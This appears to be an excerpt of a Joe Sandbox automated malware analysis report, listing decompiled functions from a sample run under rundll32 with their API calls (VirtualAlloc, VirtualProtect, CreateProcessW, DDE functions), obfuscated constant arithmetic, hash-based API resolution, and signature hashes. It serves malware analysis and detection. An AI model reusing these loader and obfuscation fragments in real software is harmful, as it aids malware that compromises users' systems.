                                                                      • Opcode Fuzzy Hash: 41114418611ba0ffa1c4070e4cc754ec6857df54afbf950ad9b71aa96dd5cc96
                                                                      • Instruction Fuzzy Hash: 5B61A9B56632009FD763DF68FD83A1937AAF708705F00802BE1A98B361DB75A944CF05
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003804C7, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 71 3804c7-380565 call 377378 ExitProcess
                                                                      C-Code - Quality: 100%
                                                                      			E003804C7() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t48;
				signed int _t49;

				_v8 = 0xb3b9;
				_v8 = _v8 + 0x1dd8;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x000002ef;
				_v20 = 0x5082;
				_t48 = 0xc;
				_v20 = _v20 / _t48;
				_v20 = _v20 ^ 0x00006c35;
				_v12 = 0x710;
				_v12 = _v12 >> 3;
				_t49 = 0x6d;
				_v12 = _v12 / _t49;
				_v12 = _v12 ^ 0x0000532a;
				_v16 = 0x5a4c;
				_v16 = _v16 ^ 0xca4a1f4d;
				_v16 = _v16 ^ 0xca4a24cd;
				E00377378(_t49, 0xbe36c403, _t49, 0x90f109b3, 0x2de);
				ExitProcess(0);
			}









                                                                      0x003804cd
                                                                      0x003804d6
                                                                      0x003804dd
                                                                      0x003804e1
                                                                      0x003804e5
                                                                      0x003804ec
                                                                      0x003804f8
                                                                      0x003804fd
                                                                      0x00380502
                                                                      0x00380509
                                                                      0x00380510
                                                                      0x00380517
                                                                      0x0038051f
                                                                      0x00380522
                                                                      0x00380529
                                                                      0x00380530
                                                                      0x00380537
                                                                      0x00380556
                                                                      0x00380560

                                                                      APIs
                                                                      • ExitProcess.KERNEL32(00000000), ref: 00380560
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2109656728.0000000000370000.00000040.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                      • Associated: 00000011.00000002.2109747843.0000000000390000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000011.00000002.2109761138.0000000000392000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_370000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExitProcess
                                                                      • String ID: *S$5l$LZ
                                                                      • API String ID: 621844428-1939029103
                                                                      • Opcode ID: 1f04293e4df0c36aeb8e1b786eb226675117cff09b963e674629fc10ae944d0b
                                                                      • Instruction ID: 0d41bd97411ec4cb34f43b319a146abd1516b65ae15cca8f6a3f67bc878e38b9
                                                                      • Opcode Fuzzy Hash: 1f04293e4df0c36aeb8e1b786eb226675117cff09b963e674629fc10ae944d0b
                                                                      • Instruction Fuzzy Hash: F911F771E0520CEBEB04DFE4D84AADEBBB1EB50714F10C189E414AB284D7F96B548F81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003D1638, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 74 3d1638-3d1641 75 3d164b-3d16d1 DdeInitializeA call 3d1328 call 3d1a14 74->75 76 3d1643 74->76 86 3d16d6-3d16eb 75->86 76->75
                                                                      APIs
                                                                      • DdeInitializeA.USER32(00000044,Function_0003E428,00000000,00000000), ref: 003D1686
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2109773757.0000000000393000.00000020.00020000.sdmp, Offset: 00393000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_393000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize
                                                                      • String ID: Link
                                                                      • API String ID: 2538663250-2526951119
                                                                      • Opcode ID: 3fb1c78c8d9ad12cf9b4b33eba7f6812679bcdf19175cfb62c44aa5bc1fdf7c5
                                                                      • Instruction ID: 3c38743f6130d6f8d239f1772fee38b68a66139816607619c910f4c361a6ef27
                                                                      • Opcode Fuzzy Hash: 3fb1c78c8d9ad12cf9b4b33eba7f6812679bcdf19175cfb62c44aa5bc1fdf7c5
                                                                      • Instruction Fuzzy Hash: FA119171604700AFD733EB74AD82A4E77F9AF05B40F909865F804DF751EA39EA049750
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0044EB40, Relevance: 3.3, APIs: 2, Instructions: 252memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 88 44eb40-44eb93 VirtualProtect 89 44eb95-44eba1 88->89 90 44eba6-44ec17 88->90 91 44ec3a-44ec85 call 44e7a0 call 44e7e0 89->91 90->91 108 44ec19-44ec37 90->108 98 44ec90-44ec9a 91->98 100 44ec9c-44eca3 98->100 101 44ecf8-44ed4a call 44e920 98->101 102 44eca5-44ecac 100->102 103 44eced-44ecf6 100->103 111 44ed4c-44ed50 101->111 112 44ed78-44ed7f 101->112 102->103 106 44ecae-44ecea call 44e7e0 102->106 103->98 106->103 108->91 111->112 116 44ed52-44ed75 call 44e880 111->116 113 44ed8a-44ed94 112->113 117 44ede6-44ee1b call 44f000 113->117 118 44ed96-44ed9d 113->118 116->112 120 44ed9f-44eda6 118->120 121 44eddb-44ede4 118->121 120->121 124 44eda8-44edd9 call 44ee20 VirtualProtect 120->124 121->113 124->121
                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0044EB8F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0044EDD9
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2109890189.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_430000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction ID: 8bd723dc9d2518fcffe7ceefaee933f8e6213669cd646feab00009da15ecd618
                                                                      • Opcode Fuzzy Hash: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction Fuzzy Hash: 2AC1B9B5A00209DFDB48CF89C590EAEB7B6BF88304F148159E9199B351D735EE42CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003D1A14, Relevance: 3.1, APIs: 2, Instructions: 56serviceCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 129 3d1a14-3d1a5a call 3d1ac8 135 3d1a5c-3d1a69 129->135 136 3d1a70-3d1aa7 DdeCreateStringHandleA DdeNameService 129->136 135->136 139 3d1aaf 136->139
                                                                      APIs
                                                                        • Part of subcall function 003D1AC8: DdeFreeStringHandle.USER32(?,?), ref: 003D1AE8
                                                                      • DdeCreateStringHandleA.USER32(?,00000000), ref: 003D1A82
                                                                      • DdeNameService.USER32(?,00000000,00000000,00000001), ref: 003D1A95
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2109773757.0000000000393000.00000020.00020000.sdmp, Offset: 00393000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_393000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: HandleString$CreateFreeNameService
                                                                      • String ID:
                                                                      • API String ID: 374373348-0
                                                                      • Opcode ID: b1285734a8fd2558f738f05895e06de6f9b3d46b391a40d7d42309368a9e31d7
                                                                      • Instruction ID: c604ed27e88ebdf04e8c4c213b88b4df8b8139de5efda60d44bdad3cf6864fa3
                                                                      • Opcode Fuzzy Hash: b1285734a8fd2558f738f05895e06de6f9b3d46b391a40d7d42309368a9e31d7
                                                                      • Instruction Fuzzy Hash: CB118232721254AFCB27EFA4D882A4A37ADAF09B00B414561FC049F347D774ED008794
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00377F4B, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 47stringCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 140 377f4b-377ffd call 382550 call 377378 lstrcmpiW
                                                                      C-Code - Quality: 80%
                                                                      			E00377F4B(WCHAR* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t35;
				int _t43;
				WCHAR* _t46;

				_push(_a12);
				_t46 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E00382550(_t35);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x71485a;
				_v28 = 0x57c810;
				_v20 = 0x2813;
				_v20 = _v20 * 0x59;
				_v20 = _v20 ^ 0x000dd428;
				_v16 = 0xdb84;
				_v16 = _v16 | 0xe2c96d38;
				_v16 = _v16 ^ 0xe2c994d7;
				_v12 = 0xc19e;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x000060ae;
				_v8 = 0x265e;
				_v8 = _v8 + 0x315a;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x02bd94c0;
				E00377378(__ecx, 0x8a39c19d, __ecx, 0x90f109b3, 0x96);
				_t43 = lstrcmpiW(_t46, _a4); // executed
				return _t43;
			}













                                                                      0x00377f52
                                                                      0x00377f55
                                                                      0x00377f57
                                                                      0x00377f5a
                                                                      0x00377f5e
                                                                      0x00377f5f
                                                                      0x00377f64
                                                                      0x00377f6b
                                                                      0x00377f72
                                                                      0x00377f79
                                                                      0x00377f94
                                                                      0x00377f97
                                                                      0x00377f9e
                                                                      0x00377fa5
                                                                      0x00377fac
                                                                      0x00377fb3
                                                                      0x00377fba
                                                                      0x00377fbe
                                                                      0x00377fc5
                                                                      0x00377fcc
                                                                      0x00377fd3
                                                                      0x00377fd7
                                                                      0x00377feb
                                                                      0x00377ff7
                                                                      0x00377ffd

                                                                      APIs
                                                                      • lstrcmpiW.KERNELBASE(?,000060AE,?,?,?,?,?,?,?,?,?,00000000), ref: 00377FF7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2109656728.0000000000370000.00000040.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                      • Associated: 00000011.00000002.2109747843.0000000000390000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000011.00000002.2109761138.0000000000392000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_370000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: lstrcmpi
                                                                      • String ID: ZHq
                                                                      • API String ID: 1586166983-2177431251
                                                                      • Opcode ID: 1dbb23c816d530a556f00a9c331316415ddf5d0f243181d7c072a17d6123fc67
                                                                      • Instruction ID: 16b577d0bcda0dcab934cfded856c8fb505bee7df177a0ea4de0cad7d20423a5
                                                                      • Opcode Fuzzy Hash: 1dbb23c816d530a556f00a9c331316415ddf5d0f243181d7c072a17d6123fc67
                                                                      • Instruction Fuzzy Hash: B611DFB6C01219ABDF11EFA4C94A8DEBFB4EF04318F108588E92466251D3B95B15DFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0044E620, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 145 44e620-44e66b call 44ea10 148 44e66d-44e677 call 44ea10 145->148 149 44e67a-44e6aa call 44e390 VirtualAlloc 145->149 148->149
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0044E6A4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2109890189.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_430000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction ID: f68585dbf165f55ab7430a9f1256731307a7b5d0931006dc10806d55b97b0460
                                                                      • Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction Fuzzy Hash: 7C113060D08289DAFF01D7E994097FFBFB56B11708F044098D5447B282D2BE57588BA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0038B86E, Relevance: 1.6, APIs: 1, Instructions: 74processCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 170 38b86e-38b949 call 382550 call 377378 CreateProcessW
                                                                      C-Code - Quality: 40%
                                                                      			E0038B86E(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a24, struct _PROCESS_INFORMATION* _a40, intOrPtr _a44, intOrPtr _a48, WCHAR* _a52, intOrPtr _a56, struct _STARTUPINFOW* _a60, intOrPtr _a68) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t49;
				int _t58;
				signed int _t60;
				int _t65;

				_push(_a68);
				_t65 = __ecx;
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(0);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E00382550(_t49);
				_v12 = 0xd1fa;
				_t60 = 0x3c;
				_v12 = _v12 / _t60;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 ^ 0x00001682;
				_v20 = 0xd4c2;
				_v20 = _v20 + 0x3986;
				_v20 = _v20 ^ 0x00013905;
				_v8 = 0x8c53;
				_v8 = _v8 >> 4;
				_v8 = _v8 << 1;
				_v8 = _v8 ^ 0x000060d6;
				_v16 = 0x467b;
				_v16 = _v16 + 0xffff2b71;
				_v16 = _v16 ^ 0xffff105c;
				E00377378(_t60, 0x8aa9db76, _t60, 0x90f109b3, 0x100);
				_t58 = CreateProcessW(_a52, _a24, 0, 0, _t65, 0, 0, 0, _a60, _a40); // executed
				return _t58;
			}











                                                                      0x0038b876
                                                                      0x0038b87b
                                                                      0x0038b87d
                                                                      0x0038b87e
                                                                      0x0038b881
                                                                      0x0038b884
                                                                      0x0038b887
                                                                      0x0038b88a
                                                                      0x0038b88d
                                                                      0x0038b890
                                                                      0x0038b891
                                                                      0x0038b892
                                                                      0x0038b893
                                                                      0x0038b896
                                                                      0x0038b897
                                                                      0x0038b89a
                                                                      0x0038b89d
                                                                      0x0038b8a0
                                                                      0x0038b8a4
                                                                      0x0038b8a5
                                                                      0x0038b8aa
                                                                      0x0038b8bb
                                                                      0x0038b8c3
                                                                      0x0038b8c6
                                                                      0x0038b8ca
                                                                      0x0038b8d1
                                                                      0x0038b8d8
                                                                      0x0038b8df
                                                                      0x0038b8e6
                                                                      0x0038b8ed
                                                                      0x0038b8f1
                                                                      0x0038b8f4
                                                                      0x0038b8fb
                                                                      0x0038b902
                                                                      0x0038b909
                                                                      0x0038b928
                                                                      0x0038b942
                                                                      0x0038b949

                                                                      APIs
                                                                      • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 0038B942
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2109656728.0000000000370000.00000040.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                      • Associated: 00000011.00000002.2109747843.0000000000390000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000011.00000002.2109761138.0000000000392000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_370000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: 0c2a7e7f22d8817370b5b33d85e2b014bcdf9d8a6a03b3886b5f04f00f255257
                                                                      • Instruction ID: d982bbd4a9d0bbea0d6cfe131df5bee83783e35b98a4dfb9c2a3566cb56867c5
                                                                      • Opcode Fuzzy Hash: 0c2a7e7f22d8817370b5b33d85e2b014bcdf9d8a6a03b3886b5f04f00f255257
                                                                      • Instruction Fuzzy Hash: 3921B572800248BBDF169F95CD09CDFBFB9FB89714F408158FA1466160D7B69A60DBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0037471A, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 175 37471a-3747ea call 382550 call 377378 SHGetFolderPathW
                                                                      C-Code - Quality: 58%
                                                                      			E0037471A(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t50;
				intOrPtr* _t61;
				void* _t62;
				signed int _t63;
				signed int _t64;

				E00382550(_t50);
				_v20 = 0xf336;
				_v20 = _v20 + 0x29f7;
				_v20 = _v20 ^ 0x000152a0;
				_v8 = 0xc9c4;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 << 3;
				_t63 = 0x6d;
				_v8 = _v8 * 0x43;
				_v8 = _v8 ^ 0x0000467c;
				_v16 = 0x763b;
				_t64 = 0x2d;
				_v16 = _v16 / _t63;
				_v16 = _v16 << 4;
				_v16 = _v16 ^ 0x000058e5;
				_v12 = 0x527e;
				_v12 = _v12 / _t64;
				_v12 = _v12 | 0xd776a7a3;
				_v12 = _v12 ^ 0xd776f938;
				_t61 = E00377378(_t64, 0x23d331d1, _t64, 0xd20b8aa4, 0x174);
				_t62 =  *_t61(0, _a4, 0, 0, _a8, 0, 0, _a4, _a8, _a12, _a16, _a20, _a24, _a28, 0); // executed
				return _t62;
			}












                                                                      0x0037473b
                                                                      0x00374740
                                                                      0x0037474a
                                                                      0x00374753
                                                                      0x0037475a
                                                                      0x00374761
                                                                      0x00374765
                                                                      0x0037476f
                                                                      0x00374772
                                                                      0x00374775
                                                                      0x0037477c
                                                                      0x00374788
                                                                      0x00374789
                                                                      0x0037478e
                                                                      0x00374792
                                                                      0x00374799
                                                                      0x003747aa
                                                                      0x003747ad
                                                                      0x003747b4
                                                                      0x003747d3
                                                                      0x003747e4
                                                                      0x003747ea

                                                                      APIs
                                                                      • SHGetFolderPathW.SHELL32(00000000,D776F938,00000000,00000000,000058E5), ref: 003747E4
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2109656728.0000000000370000.00000040.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                      • Associated: 00000011.00000002.2109747843.0000000000390000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000011.00000002.2109761138.0000000000392000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_370000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FolderPath
                                                                      • String ID:
                                                                      • API String ID: 1514166925-0
                                                                      • Opcode ID: 0a1e481ed0b4bb684b4a4fbdce82325e9ffb300045724f91d1da592bf306b1e2
                                                                      • Instruction ID: eec9f8167817eead5720bab2c6ab1532545c95e219ead10e06bbc818f28e684d
                                                                      • Opcode Fuzzy Hash: 0a1e481ed0b4bb684b4a4fbdce82325e9ffb300045724f91d1da592bf306b1e2
                                                                      • Instruction Fuzzy Hash: 1E210372D01208FBEF15DFE4C94A8DEBBB5EF05354F108089E924AA250D3B59B10DF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Function 00398330, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetMonitorInfoA.USER32(?,?), ref: 00398361
                                                                      • GetSystemMetrics.USER32(00000000), ref: 0039839D
                                                                      • GetSystemMetrics.USER32(00000001), ref: 003983A8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2109773757.0000000000393000.00000020.00020000.sdmp, Offset: 00393000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_393000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem$InfoMonitor
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfo
                                                                      • API String ID: 4250584380-1428758730
                                                                      • Opcode ID: 7852f6ab3cc76c167b557f4722f18a20d023df66d34fc2b01772c39cd475adcd
                                                                      • Instruction ID: 161e60deb336ecb85954881dfc0e022f535172b301134b9c48ce7a63e4a931ae
                                                                      • Opcode Fuzzy Hash: 7852f6ab3cc76c167b557f4722f18a20d023df66d34fc2b01772c39cd475adcd
                                                                      • Instruction Fuzzy Hash: A411E97E6027059FDB22CF64EC857A7B7ECEB86B14F00452AED56D7240DBB0A804C7A0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003985AC, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • EnumDisplayMonitors.USER32(?,?,?,?), ref: 003985E5
                                                                      • GetSystemMetrics.USER32(00000000), ref: 0039860A
                                                                      • GetSystemMetrics.USER32(00000001), ref: 00398615
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2109773757.0000000000393000.00000020.00020000.sdmp, Offset: 00393000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_393000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem$DisplayEnumMonitors
                                                                      • String ID: /}Au$EnumDisplayMonitors
                                                                      • API String ID: 1389147845-1105134141
                                                                      • Opcode ID: a794cd2beed358691d6493059eef5c57589e1198f3acd662009763edc32945d1
                                                                      • Instruction ID: 4a0c1776f7b56326eca4a46ce745a3817656afeaa1dc6fe1d7a61dc90b118775
                                                                      • Opcode Fuzzy Hash: a794cd2beed358691d6493059eef5c57589e1198f3acd662009763edc32945d1
                                                                      • Instruction Fuzzy Hash: D631F0B2A0520AAFDF12DFA4DD459EF77BCAB86304F014526EA15D7201DB34D904CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00398404, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 00398471
                                                                      • GetSystemMetrics.USER32(00000001), ref: 0039847C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2109773757.0000000000393000.00000020.00020000.sdmp, Offset: 00393000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_393000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfoA
                                                                      • API String ID: 4116985748-2822609925
                                                                      • Opcode ID: f8609ae9b261645e6d07139d412ed785dcd78492796b80f43c01c0caf70d64b8
                                                                      • Instruction ID: d2cc4fc5a6676d42e9d0aa4de2351f3e2825b88a472998cac5a0f7adccfbc3dc
                                                                      • Opcode Fuzzy Hash: f8609ae9b261645e6d07139d412ed785dcd78492796b80f43c01c0caf70d64b8
                                                                      • Instruction Fuzzy Hash: 7611D6316027059FDB22CF61AC467E7B7ECEF86720F00452AED55DB240DB70A84087A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003984D8, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 00398545
                                                                      • GetSystemMetrics.USER32(00000001), ref: 00398550
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2109773757.0000000000393000.00000020.00020000.sdmp, Offset: 00393000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_393000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfoW
                                                                      • API String ID: 4116985748-1558784340
                                                                      • Opcode ID: b647f244b764995b5290214e44e2720819137f3bfdf00889223fa66011e5009d
                                                                      • Instruction ID: a14e0bd6cfa7037a24772400445c9567e1a42339faadec4a168815617b3a2849
                                                                      • Opcode Fuzzy Hash: b647f244b764995b5290214e44e2720819137f3bfdf00889223fa66011e5009d
                                                                      • Instruction Fuzzy Hash: 56110871A027049FDB22CF649C45BA7B7ECEB47310F05492BED59D7280DB71A809CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00398298, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 003982E6
                                                                      • GetSystemMetrics.USER32(00000001), ref: 003982F8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2109773757.0000000000393000.00000020.00020000.sdmp, Offset: 00393000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_393000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$MonitorFromPoint
                                                                      • API String ID: 4116985748-3670600901
                                                                      • Opcode ID: 19dfc73e612e1170d84dda4d7a9f623d8db6d1f6855100fcde0791c00b905440
                                                                      • Instruction ID: 5eff99e5c28bc821fc9f302779d84fffbc4fa29255ac0543ffdd64589dea7310
                                                                      • Opcode Fuzzy Hash: 19dfc73e612e1170d84dda4d7a9f623d8db6d1f6855100fcde0791c00b905440
                                                                      • Instruction Fuzzy Hash: B901D13E203308AFDF024F50ECC5B9E7B99EB82B50F044126F9A4DB211CB70AC108BA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00398170, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 003981C1
                                                                      • GetSystemMetrics.USER32(00000001), ref: 003981CD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2109773757.0000000000393000.00000020.00020000.sdmp, Offset: 00393000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_393000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$MonitorFromRect
                                                                      • API String ID: 4116985748-120404372
                                                                      • Opcode ID: 7b14c3acf82b982663c5838e02fd0335a4e9d85234f6ff9d26ea404d4cdf4fbd
                                                                      • Instruction ID: 7a6f30c6f2a72769283a0d35a8dc904a1edcfe277b220aae084cc0b44981e464
                                                                      • Opcode Fuzzy Hash: 7b14c3acf82b982663c5838e02fd0335a4e9d85234f6ff9d26ea404d4cdf4fbd
                                                                      • Instruction Fuzzy Hash: 900181322012159BDF129F14EC86B57B79DE782399F158063ED14CB202CB75DC429BB0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003D2B38, Relevance: 6.1, APIs: 4, Instructions: 61COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DdeCreateStringHandleA.USER32(00000015,00000000), ref: 003D2B7C
                                                                      • DdeClientTransaction.USER32(00000000,000000FF,00000000,?,?,00001034,000003E8,?), ref: 003D2BA9
                                                                      • DdeGetLastError.USER32(00000015), ref: 003D2BBB
                                                                      • DdeFreeStringHandle.USER32(00000015,?), ref: 003D2BCD
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2109773757.0000000000393000.00000020.00020000.sdmp, Offset: 00393000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_393000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: HandleString$ClientCreateErrorFreeLastTransaction
                                                                      • String ID:
                                                                      • API String ID: 2421758087-0
                                                                      • Opcode ID: b00ff0f742862629121b1fec3519ff44e08ce37f379cba0a90b45280c9893d35
                                                                      • Instruction ID: 3407da8d9a4d85b6f2bf5dc44b3a33b888a4794c44b3160ff0dc31c97d65f1d8
                                                                      • Opcode Fuzzy Hash: b00ff0f742862629121b1fec3519ff44e08ce37f379cba0a90b45280c9893d35
                                                                      • Instruction Fuzzy Hash: CC2159762042409FDB46EF68D8C1F6AB7E8AB49310F158196F998CF3A6D771EC40CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

